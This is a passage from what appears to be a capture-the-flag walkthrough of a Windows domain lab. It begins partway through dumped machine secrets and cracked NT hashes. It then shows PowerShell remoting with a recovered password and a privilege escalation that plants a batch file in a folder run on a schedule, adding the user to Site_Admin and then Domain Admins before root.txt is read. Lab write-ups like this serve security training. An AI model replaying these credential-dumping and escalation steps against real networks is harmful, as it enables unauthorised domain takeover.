$MACHINE.ACC:plain_password_hex:d0ffff99f06b17c84500af8e4ddff5ce291eb3432697a1ffb217e83d6b0732d75c897ec8050d4814c90ed10618a30013ddaf0ef1511fc1fcd140f806613365dcaa7ae7d36fb7c97a08dc31e48898048b3ac54c1d9caeb28e3c3ad1b23025a562e63c3b77cc733b281bd30717ee96bd9381d914a5fc6224356341287d4b1673026810e17591458368e4049ddc45fc5e6a03c2d194b31e968dc34862242815a2da2cf55889b40a92bc63ac1737e04576baa127630c488829f33be169aeb0b3d07f5978ee458a21baec91d373df26a45f06ffb929424cef5e8ec95cf31944c59f6ed2f59e32326944fc77cab250ce7f191b
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:8cb6777ad4f5aa672d41a1f5c41f9640
[*] DPAPI_SYSTEM
dpapi_machinekey:0x574d0cc939c9f986cba32d1546a7fa28747425e0
dpapi_userkey:0x4a77ea6673a027ecd81e4ca010b1d3f70fe1d9cd
[*] NL$KM
0000 62 2A 29 8D F9 77 CC DD EE EB 23 20 B2 E2 AF 59 b*)..w....# ...Y
0010 0B F6 33 E0 95 5D B0 03 B1 01 85 55 9D 16 64 4D ..3..].....U..dM
0020 53 1F 93 7B FB EF 2B F7 6E 76 B1 02 3D 63 CC DF S..{..+.nv..=c..
0030 F0 35 6F E3 19 8A 69 C1 2E F6 78 80 45 51 EE 0A .5o...i...x.EQ..
NL$KM:622a298df977ccddeeeb2320b2e2af590bf633e0955db003b10185559d16644d531f937bfbef2bf76e76b1023d63ccdff0356fe3198a69c12ef678804551ee0a
[*] Cleaning up...
➜ cat .\hashes
a29f7623fd11550def0192de9246f46b
31d6cfe0d16ae931b73c59d7e0c089c0
31d6cfe0d16ae931b73c59d7e0c089c0
24571eab88ac0e2dcef127b8e9ad4740
29ab86c5c4d2aab957763e5c1720486d
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt --format=NT .\hashes
Password@123 (?)
Privilege Escalation (awallace)
List the domain users on the DC:
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { net user }
Administrator awallace chall
edavies Guest imonks
jmorgan krbtgt lhopkins
$cred = New-Object System.Management.Automation.PSCredential("acute\awallace", (ConvertTo-SecureString -AsPlainText -Force "Password@123"))
$cred = New-Object System.Management.Automation.PSCredential("acute\lhopkins", (ConvertTo-SecureString -AsPlainText -Force "Password@123"))
$cred = New-Object System.Management.Automation.PSCredential("acute\chall", (ConvertTo-SecureString -AsPlainText -Force "Password@123"))
Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { whoami }
Only awallace worked.
PS C:\Windows\system32> $cred = New-Object System.Management.Automation.PSCredential("acute\awallace", (ConvertTo-SecureString -AsPlainText -Force "Password@123"))
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { whoami }
acute\awallace
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { ls '/Program Files/keepmeon' }
Directory: C:\Program Files\keepmeon
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-a---- 21/12/2021 14:57 128 keepmeon.bat ATSSERVER
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat '/Program Files/keepmeon/keepmeon.bat' }
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
if not "%%x" == "%~0" call "%%x"
)

Script purpose: the script recursively iterates through all .bat files in the current directory and its subdirectories, calling each one except itself.
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { net group }
*Domain Admins
...
*Site_Admin
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { net group site_admin }
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group
Members
Privilege Escalation (Domain Admins)
Drop a .bat file into the keepmeon directory that adds awallace to the Site_Admin group; the scheduled script will call it:
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { Set-Content -Path '/Program Files/keepmeon/letmein.bat' -Value 'net group site_admin awallace /add /domain' }
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat '/Program Files/keepmeon/letmein.bat' }
net group site_admin awallace /add /domain
After 5 minutes we are added to the group:
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { net user awallace /domain }
User name awallace
Full Name Aileen Wallace
Local Group Memberships
Global Group memberships *Domain Users *Managers *Site_Admin
Upgrade to Domain Admins
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { net group "Domain Admins" awallace /add /domain }
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { ls /Users -Rec }
...
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-ar--- 20/12/2024 16:51 34 root.txt ATSSERVER
Directory: C:\Users\Administrator\Documents
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-a---- 30/01/2022 18:54 320 Clear-Admins.ps1 ATSSERVER
Directory: C:\Users\imonks\Desktop
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-ar--- 20/12/2024 16:51 34 user.txt ATSSERVER
-a---- 20/12/2024 19:34 691 wm.ps1 ATSSERVER
...
Root.txt
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat /Users/Administrator/Desktop/root.txt }
31fc4f59e57da529b2924f4d1dc1ee41
Admin Script
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat /Users/Administrator/Documents/Clear-Admins.ps1 }
Import-Module ActiveDirectory
Get-ADGroupMember 'site_admin' | ForEach-Object {Remove-ADGroupMember 'site_admin' $_ -Confirm:$false}
Get-ADGroupMember 'Domain Admins' | ForEach-Object {Remove-ADGroupMember 'Domain Admins' $_ -Confirm:$false}
Add-ADGroupMember -Identity 'Domain Admins' -Members Site_admin,Administrator